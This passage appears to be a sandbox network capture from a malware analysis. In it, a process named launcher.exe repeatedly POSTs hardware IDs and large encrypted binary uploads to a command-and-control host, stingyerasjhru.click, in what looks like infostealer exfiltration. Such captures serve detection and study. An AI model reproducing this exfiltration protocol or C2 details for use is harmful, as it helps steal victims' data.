2024-12-27 21:31:05 UTC	15040	OUT	Data Raw: 2d 2d 5a 35 5a 35 33 53 48 44 4d 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 42 30 42 31 38 42 42 37 32 46 39 36 44 44 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 5a 35 5a 35 33 53 48 44 4d 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 35 5a 35 33 53 48 44 4d 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 32 4a 73 59 57 74 76 58 33 0d 0a 2d 2d 5a 35 5a 35 33 53 48 44 4d 54 57 0d Data Ascii: --Z5Z53SHDMTWContent-Disposition: form-data; name="hwid"8AB0B18BB72F96DD962CEBBDF1A894EB--Z5Z53SHDMTWContent-Disposition: form-data; name="pid"2--Z5Z53SHDMTWContent-Disposition: form-data; name="lid"pqZnKP--b2JsYWtvX3--Z5Z53SHDMTW
2024-12-27 21:31:06 UTC	1136	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 21:31:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qg1en4jnkhkocsbhdgem8sl02n; expires=Tue, 22 Apr 2025 15:17:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QcQfqYTFQU5CrJIYRWpOAzn7U6h8b9wQcSih1Kt4qT%2BNfGZ6wHUUDE0CNHiJGzxA3mtEKc528JgbR%2BmCBmGkc92EOdhIWxpz4EdRsGVKr5CbThvRIaIu0zSB3UutetXnWemqTlkDFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8c6a5ea80672ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2108&min_rtt=2090&rtt_var=797&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2853&recv_bytes=15977&delivery_rate=1397129&cwnd=236&unsent_bytes=0&cid=72b02af289f7540b&ts=1011&x=0"
2024-12-27 21:31:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 21:31:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49712	104.21.58.80	443	7104	C:\Users\user\Desktop\launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 21:31:07 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2L20RSF7XLGO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20536 Host: stingyerasjhru.click
2024-12-27 21:31:07 UTC	15331	OUT	Data Raw: 2d 2d 32 4c 32 30 52 53 46 37 58 4c 47 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 42 30 42 31 38 42 42 37 32 46 39 36 44 44 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 32 4c 32 30 52 53 46 37 58 4c 47 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 4c 32 30 52 53 46 37 58 4c 47 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 32 4a 73 59 57 74 76 58 33 0d 0a 2d 2d 32 4c 32 30 52 53 46 37 58 Data Ascii: --2L20RSF7XLGOContent-Disposition: form-data; name="hwid"8AB0B18BB72F96DD962CEBBDF1A894EB--2L20RSF7XLGOContent-Disposition: form-data; name="pid"3--2L20RSF7XLGOContent-Disposition: form-data; name="lid"pqZnKP--b2JsYWtvX3--2L20RSF7X
2024-12-27 21:31:07 UTC	5205	OUT	Data Raw: 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Wun 4F([:7s~X`nO`i
2024-12-27 21:31:08 UTC	1139	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 21:31:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l1ihimkhi02n41f307jq1t0mhl; expires=Tue, 22 Apr 2025 15:17:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VvosHgr0NlLncX7nt4mrbGw8avAygUuk%2Fse8kFUj0Rv5yKx21fNTcgdOjQBPzAzwtTNhYMetm7QVA%2FrhLnPevXf6DCKnIvYzgdKi1fJDRA%2FwBiULS0KGgb2hdqRBPqeQir%2Ffb2mAzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8c6a6dfbec8cdd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1980&rtt_var=761&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2852&recv_bytes=21496&delivery_rate=1421616&cwnd=162&unsent_bytes=0&cid=fada9520572d1d62&ts=971&x=0"
2024-12-27 21:31:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 21:31:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49713	104.21.58.80	443	7104	C:\Users\user\Desktop\launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 21:31:10 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7Q2S1CRO2NSR12G User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1250 Host: stingyerasjhru.click
2024-12-27 21:31:10 UTC	1250	OUT	Data Raw: 2d 2d 37 51 32 53 31 43 52 4f 32 4e 53 52 31 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 42 30 42 31 38 42 42 37 32 46 39 36 44 44 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 37 51 32 53 31 43 52 4f 32 4e 53 52 31 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 51 32 53 31 43 52 4f 32 4e 53 52 31 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 32 4a 73 59 57 74 76 58 33 0d 0a 2d 2d Data Ascii: --7Q2S1CRO2NSR12GContent-Disposition: form-data; name="hwid"8AB0B18BB72F96DD962CEBBDF1A894EB--7Q2S1CRO2NSR12GContent-Disposition: form-data; name="pid"1--7Q2S1CRO2NSR12GContent-Disposition: form-data; name="lid"pqZnKP--b2JsYWtvX3--
2024-12-27 21:31:10 UTC	1136	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 21:31:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p0e86o1ai6mrk2qdvq4t1u9se8; expires=Tue, 22 Apr 2025 15:17:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIxfjDxB9KS1Td0ftFz6lTa2huUIdxQBFCscF4PuMHzdxhLVSj4vdX%2FolLiUqMFCTWcvXNZSL2rRV72wxApFIUva1DMvs5eRCJLEXVR%2BZO7iszJHzn%2BcCyUCLZPITDTn3%2BgzAky4IA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8c6a7de8c542b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1718&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=2168&delivery_rate=1663817&cwnd=184&unsent_bytes=0&cid=e2191f6f8dd72c31&ts=804&x=0"
2024-12-27 21:31:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 21:31:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49714	104.21.58.80	443	7104	C:\Users\user\Desktop\launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 21:31:12 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OUR7IG7QLPPSJ8ENS0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569008 Host: stingyerasjhru.click
2024-12-27 21:31:12 UTC	15331	OUT	Data Raw: 2d 2d 4f 55 52 37 49 47 37 51 4c 50 50 53 4a 38 45 4e 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 42 30 42 31 38 42 42 37 32 46 39 36 44 44 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 4f 55 52 37 49 47 37 51 4c 50 50 53 4a 38 45 4e 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 55 52 37 49 47 37 51 4c 50 50 53 4a 38 45 4e 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 32 4a 73 59 Data Ascii: --OUR7IG7QLPPSJ8ENS0Content-Disposition: form-data; name="hwid"8AB0B18BB72F96DD962CEBBDF1A894EB--OUR7IG7QLPPSJ8ENS0Content-Disposition: form-data; name="pid"1--OUR7IG7QLPPSJ8ENS0Content-Disposition: form-data; name="lid"pqZnKP--b2JsY
2024-12-27 21:31:12 UTC	15331	OUT	Data Raw: 15 5c ac f2 2d 93 44 3f 4e d0 c9 e7 38 42 9e d8 f8 7c 13 7d 58 eb f5 99 58 c3 e8 dd bb 3c a4 16 0d 1e 95 7f 9a 7a e9 cf e7 8a 06 4a b1 1b 12 5c 46 ce b7 f0 c1 52 af 97 68 e1 3e 03 51 1e d1 9c 16 26 e9 79 20 d7 98 cb 30 e0 d2 ba a9 f7 fd 04 c5 f1 8d 5b 23 f8 2e be d5 a4 fb 0b 7b 95 69 e1 e1 e1 84 c5 06 19 1a fa a6 64 40 7d e3 1e 1c d8 c4 31 cf 93 07 0e a2 2b b2 20 f2 20 5d d1 e6 69 52 65 50 29 1e f6 84 2a f0 c2 29 f9 d0 2e 4e 99 69 48 42 eb b4 d5 c3 5e 44 66 a5 4e d2 67 d8 1f 0a 5a 3d 32 24 e9 41 58 d7 45 c1 e5 42 41 67 ef 81 9e 8c 3a 71 72 97 e2 ed 0f c1 51 36 ac 6a df 3d 65 51 99 5e 3c 40 31 a0 fc cd 6d 8f a0 5e b3 7d c2 65 5d 8f a7 25 6f 33 ca 35 0b af 68 ee 76 3e 79 9f dc 5d 7c 7b a2 a2 fd 75 1b 06 fe 72 55 d1 e5 23 c8 e9 fe 45 6a e6 95 38 82 a7 89 8e Data Ascii: \-D?N8B\|}XX<zJ\FRh>Q&y 0[#.{id@}1+ ]iReP)*).NiHB^DfNgZ=2$AXEBAg:qrQ6j=eQ^<@1m^}e]%o35hv>y]\|{urU#Ej8
2024-12-27 21:31:12 UTC	15331	OUT	Data Raw: 98 97 e5 a8 46 70 22 d6 73 a0 d1 9f 73 7b 3d f1 85 07 ef 1b 06 69 a1 4a 2c c6 dc f0 44 02 d2 23 f5 2a 42 bb 03 14 6d c9 83 81 7d 3b 8d 4e cd bf 4c eb a5 63 3c d7 7c e3 87 cf cf b7 f8 bd dd 2a 77 29 6d 75 72 dc fa bc 23 56 bd b1 48 9c 6f b9 55 7f c3 ba c4 d5 ad f4 d4 8e d4 8b 6c d7 3c f2 6c bd fa bc ae 79 cd c3 96 45 f5 20 5c 4c 22 8f 91 4f bd 8f a2 7d e5 b4 d0 25 78 72 b4 14 b5 6c e7 52 55 f8 47 42 1e d8 38 ba 1b 40 64 82 71 93 92 97 24 d2 3c b5 ce 73 6a bc 43 1d ce ed c9 a9 d6 73 21 ed df fb 40 1d 6f df 4c 09 31 08 ac ac c0 b3 96 02 af ae 55 d9 21 c0 56 ad 7b 52 31 09 76 e3 6a 57 8e ec 0d 79 20 64 2a 2f f9 72 ab f5 74 1c 1f a5 4e ec 26 7f cc 61 20 df 41 af 18 7f ec d9 55 90 d1 ce 95 55 ac 50 3e fe cc a9 3d 23 bb 42 83 9d 46 df 9c 58 99 f7 1f c7 8a a4 83 Data Ascii: Fp"ss{=iJ,D#Bm};NLc<\|w)mur#VHoUl<lyE \L"O}%xrlRUGB8@dq$<sjCs!@oL1U!V{R1vjWy d*/rtN&a AUUP>=#BFX
2024-12-27 21:31:12 UTC	15331	OUT	Data Raw: 33 6f 07 92 5b c6 ea ca 36 fd 98 8c e0 81 d9 5c 61 68 00 46 ec cb 0b 0f 1b b9 a7 20 b2 33 7f f6 e6 a7 c7 4e 41 cc f0 75 26 3b ae b8 fb 4a 19 28 9a 1c 1e a5 bc 2c 74 a1 58 3d fc ef 74 79 af c7 04 ee cb 0b 88 ab d1 87 0a 56 94 79 43 4c 8f b0 7c 9e d2 0c 7d 32 42 93 e2 e3 b1 33 64 f6 08 27 36 35 22 e3 fd f7 e3 73 11 8f be 92 61 b0 85 a0 9f 24 97 32 7b e3 f9 d5 92 52 0a 82 54 19 f6 eb 47 6a 22 56 ba d5 7d b9 bb d9 48 e9 71 f7 50 f5 a9 9c 0a d2 81 41 0a 7d f8 cb 04 7e e3 9b ba c5 83 11 81 1a 54 44 6d dc 95 a7 fb e2 9c 9f 96 f3 09 70 c1 b8 68 f9 9e c7 d1 e4 6f 56 5f 7e 26 95 71 df b2 5c 3c 26 6b a4 2e 64 dc 09 bd e5 7d fb a7 e9 39 56 5a b4 99 71 e6 74 01 67 8d 1c bf a5 88 9e 72 40 9c 37 99 ac 98 f7 2b e2 0f 01 cf 84 7a 16 af 78 15 14 9b fc a7 36 bd 46 3e 22 43 Data Ascii: 3o[6\ahF 3NAu&;J(,tX=tyVyCL\|}2B3d'65"sa$2{RTGj"V}HqPA}~TDmphoV_~&q\<&k.d}9VZqtgr@7+zx6F>"C
2024-12-27 21:31:12 UTC	15331	OUT	Data Raw: 79 42 a8 26 50 4e c0 75 c9 e5 8a bb 3e d1 00 ed 41 43 fa 6f a6 a3 41 8a 47 4c b8 27 a2 fb 19 a9 5b 2e 97 ac b5 a6 48 26 cf 4e 76 46 61 4a 39 1d ba b9 44 d8 9f 2e 8c 67 cc f5 ad ec c8 d0 5a 2c 99 f9 58 f6 f6 d8 72 83 e9 ab 6a 72 98 24 56 85 3c b2 74 f5 8a 6b 58 b2 83 56 16 56 29 9a 1c e8 c3 35 fc 72 45 7e ed b7 27 2e 03 e6 0e cb aa 60 5b 7c c5 46 68 c6 de f2 67 b5 af 10 85 8c e7 4f e1 bd 16 7e 9b d6 d6 ad ad 99 55 ed 43 6c 76 ed b5 0e 9e 7e 1e d6 b9 74 47 1a db ed 43 d7 d9 11 71 3a 75 15 5a f3 c3 d3 38 71 1f bc 50 fb 26 ce a1 5b 64 b5 c8 2a 9b 8e 8a 47 71 5c ce 4c 63 c3 46 da 78 b7 c1 cc a5 03 9b 1f bc 8d 69 fd 88 98 62 bc 5d 64 e6 c9 08 af 1f 85 01 b2 47 1f 9c 3a f0 4c 9f 45 af 10 fb 25 de 32 42 8f c2 3d 00 62 49 66 19 88 5c 60 37 85 bc e5 a7 05 7b 95 80 Data Ascii: yB&PNu>ACoAGL'[.H&NvFaJ9D.gZ,Xrjr$V<tkXVV)5rE~'.`[\|FhgO~UClv~tGCq:uZ8qP&[d*Gq\LcFxib]dG:LE%2B=bIf\`7{
2024-12-27 21:31:12 UTC	15331	OUT	Data Raw: 11 c0 f5 29 0e af 1d 7d 96 f6 8a 48 02 5a bb d1 6b cf d4 d0 7f 01 96 c3 39 a0 ba 8f 35 b0 73 1f eb 17 00 27 6f fb 67 3e 60 9c 16 f2 2c 21 77 40 28 75 ac 93 82 d9 1b af fc b4 d3 c0 6f 8c 9e bb 17 d0 ee e6 19 26 2f 68 63 1c e4 13 76 3e 50 b2 be 88 bb fc d8 5a 46 c0 db 1f 7b 25 e9 b2 e7 c0 d1 9f d7 d0 95 d3 64 72 74 e8 65 01 e0 a1 08 a6 74 39 72 db 81 7c 2c fa ff b6 4e 3a 03 4f 46 ff 11 34 9c 56 0e 0c 91 74 24 82 34 76 8e 27 b6 89 a2 a2 4e 6e 63 c2 f0 89 5f f2 cc 71 00 c3 88 66 ef 96 a4 11 c1 cf ea ec e4 bd be a7 5c c7 52 67 a4 be ad 7f f5 e7 3b e7 bb d0 bb cb 49 4b b3 22 7b 52 b8 c5 62 9a 29 28 b6 71 f2 8f 3e 34 6d 02 0f 0c 67 2b 09 fe 3d a8 d8 2c 22 f4 da ef 0e a9 2d ed 28 44 ce 50 9a 51 ee 5d 94 81 93 9e 4d da f6 d1 4b 05 ea 3e 07 bc 18 74 f0 40 fd fe 12 Data Ascii: )}HZk95s'og>`,!w@(uo&/hcv>PZF{%drtet9r\|,N:OF4Vt$4v'Nnc_qf\Rg;IK"{Rb)(q>4mg+=,"-(DPQ]MK>t@
2024-12-27 21:31:12 UTC	15331	OUT	Data Raw: 2b a6 a0 72 f7 55 68 ff 3a 91 9d fd 59 71 82 b0 1d 83 99 db 70 e1 84 bf 30 8a fe ac 54 7a b0 eb 03 e4 3e 2f c7 09 99 f9 c8 f8 10 11 30 b4 fb 40 93 da 5c eb 8a eb a4 78 5d 85 ce e6 44 af a9 e4 3f cc c1 ce e0 55 85 fe 3f d9 3e 55 8f 3b 06 02 76 92 67 44 04 77 e2 f3 76 77 11 77 63 c0 31 b6 29 28 fb 33 ee f0 8c 62 44 b7 58 e2 3d 2d 51 cd b5 d5 b8 75 7d b6 5f 41 41 cf 8f bc 7e 9b c2 5b cc ac ae 4a df ec ff 34 b6 da c2 71 3b c1 9b 49 3b b6 b9 cb b6 21 79 78 fa 0e 70 3d 7d db 97 72 11 c3 f5 9b 76 f9 cd 3d 3c 38 40 74 f8 38 ba 0f 78 8f af 2b 6d 76 6d ae da 0c 9e ac 82 4e 29 b6 af 5f 91 02 7e 06 a9 91 21 c0 0f 89 ff 97 70 b0 cb 6b 07 76 a7 cc 9c 1a 03 76 c9 09 f9 fa 34 27 64 d1 44 b3 86 8a aa ae 3b d6 35 23 70 e8 84 74 4d 2f 73 e4 4d 9c f3 8e 6d b9 fd ff fd 7b cb Data Ascii: +rUh:Yqp0Tz>/0@\x]D?U?>U;vgDwvwwc1)(3bDX=-Qu}_AA~[J4q;I;!yxp=}rv=<8@t8x+mvmN)_~!pkvv4'dD;5#ptM/sMm{
2024-12-27 21:31:12 UTC	15331	OUT	Data Raw: 52 3c 8f 34 8f 16 fd 56 75 e7 9a 77 e1 ca 66 4a 58 00 7c 3b 8b 97 9f 92 06 05 6d a9 3d 57 ac c9 80 e1 c3 44 d3 43 dc 45 9a 0b f1 98 55 ac 3c 66 b9 69 b9 61 14 d5 8e e9 68 39 08 ec 7d 7e 79 ab 0e 3c a4 8d 87 4f 0c c0 86 72 43 d8 cc ef a7 fd 79 71 34 22 e8 ef e5 77 97 09 3f 8c 4e 8b 47 7f f2 43 aa f6 5f 41 44 8d 0b 14 06 cf da a1 98 eb 30 04 df 23 97 2f b1 a9 4b 7c ea 29 17 c6 e6 7b bc af 97 c1 7d 6d 67 ee 26 51 17 06 98 94 81 04 54 fd 73 1b 7d 75 8b 27 91 c6 cd b1 5e 9e fd 7a 42 87 f6 71 d8 04 f4 62 6b 43 8f ed ad 0d 27 9f a3 1d 12 07 1f 04 2b 95 05 86 de 5a ed ff f9 a8 6e eb e2 6f c3 09 7e f0 3b 9a 32 a2 40 d9 d4 c2 96 b8 01 77 8a 33 0f 30 bd 01 52 14 66 3d 5e 0b 77 2d 68 ea 19 64 ae 24 83 14 f5 62 4e 96 84 81 57 7a 48 f2 d0 19 e0 fe 22 f4 64 68 f1 47 f0 Data Ascii: R<4VuwfJX\|;m=WDCEU<fiah9}~y<OrCyq4"w?NGC_AD0#/K\|){}mg&QTs}u'^zBqbkC'+Zno~;2@w30Rf=^w-hd$bNWzH"dhG
2024-12-27 21:31:12 UTC	15331	OUT	Data Raw: b6 07 a6 1f 2e 62 f0 b5 c2 e0 4b 79 07 4b 11 11 d3 38 62 00 3b 9b 9d 47 49 36 77 b4 4b 25 f4 a2 c3 cc c9 a4 74 9a b6 f8 48 b0 5d ae 8c 4e f2 c2 4f a4 7b b1 97 47 71 c5 ee 60 7c 89 0a 6f 29 7f e3 fc 71 9b d6 b4 db e8 e9 91 ff cf a6 fb 3f 8b dd 3c ce e0 8f a7 68 eb d1 39 26 4a b5 21 48 2f 1b 98 fd 9e 7d 09 57 a2 15 e8 61 e3 9f c4 76 23 2e 55 04 bd 7a b7 5e 61 1e 5b ae 7b 55 63 8a 36 bf 1e c8 15 48 a5 68 ea 9f 54 0e 72 9f d3 bf 50 79 c9 8d 40 8e 2c d3 d2 be 89 ec 70 07 0d 83 22 52 a1 17 39 71 35 2f 94 f2 df 07 ac 1e 85 9e 2d 82 94 32 f6 b7 bf f1 3c 2b 98 32 a8 f3 db a9 d6 bc a2 7a f5 5f 96 43 64 8e 3b 72 97 13 09 49 c6 95 4c 65 f0 0a 5e 52 88 88 f1 65 55 dd 07 bf 75 c9 63 9c 5a e2 22 33 72 cb 19 3d c3 71 36 66 b2 32 dd 70 25 10 f3 9b f0 52 d6 07 bd 76 d6 04 Data Ascii: .bKyK8b;GI6wK%tH]NO{Gq`\|o)q?<h9&J!H/}Wav#.Uz^a[{Uc6HhTrPy@,p"R9q5/-2<+2z_Cd;rILe^ReUucZ"3r=q6f2p%Rv
2024-12-27 21:31:12 UTC	15331	OUT	Data Raw: 46 25 d7 44 21 8b 90 70 5d c0 c7 b2 68 07 b0 2c 15 49 f4 79 10 25 7c 1d 70 f7 db 1f 8e 9e d4 4d bb 61 e5 9d 64 37 01 a6 35 29 e5 eb c7 f7 20 2e 4e a0 3a a6 30 f4 a6 15 b7 52 48 39 0d 09 fc b6 12 9f c0 10 90 15 3f b9 ca 9f ce b7 93 b6 54 c9 16 49 f6 b8 6b d7 d1 2f ee a1 22 57 be 2f e7 ee 23 0a 82 b2 5c 3c 2e 59 02 8f a0 34 46 ee 46 db b2 32 5a 85 85 7d 76 f2 0a 85 97 1e ee 83 95 11 26 fc 38 5d 17 a1 90 a5 f8 ac ed 46 08 2d f6 06 2a 4a 53 e8 bb 13 2c 28 50 df 62 0e d1 0c 8e c2 61 00 46 45 38 f5 b1 06 62 9d 8b 64 d6 4e e4 12 3c 32 1f ee 8f eb ee f7 fe 77 b1 e8 30 f6 23 21 8b d8 86 99 6c bd 7f 96 7a e7 af c4 f0 79 67 52 61 b7 ec 4b 66 fb 07 fc 31 54 b8 dc 94 17 aa 77 a0 58 bb f6 5d 2a 89 98 19 4d 96 c7 9c 5d 8b df 03 9c 9b 18 a9 10 5d 52 2a c4 77 f9 0e 6d a1 Data Ascii: F%D!p]h,Iy%\|pMad75) .N:0RH9?TIk/"W/#\<.Y4FF2Z}v&8]F-JS,(PbaFE8bdN<2w0#!lzygRaKf1TwX]M]]R*wm
2024-12-27 21:31:15 UTC	1143	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 21:31:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eu2gcv75g4eh3reuqg02eclrfb; expires=Tue, 22 Apr 2025 15:17:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyjNFEiPeJFcp9%2BCHq1GezYMESOnTab8FDDeTmRwlk0hi64424Vbo20FECmqUYf0SKKb%2Fnvgj2U%2BmGodCCZ6OpQ6ufDXPOxsrNkwwWyYSZ8noxhTx5g%2BIOSpPu2eXCsGnthDnke7Gg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8c6a8d7f11f793-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1698&rtt_var=644&sent=352&recv=590&lost=0&retrans=0&sent_bytes=2852&recv_bytes=571559&delivery_rate=1687861&cwnd=152&unsent_bytes=0&cid=27b29390c472c631&ts=2511&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	104.21.58.80	443	7104	C:\Users\user\Desktop\launcher.exe

Timestamp	Bytes transferred	Direction	Data
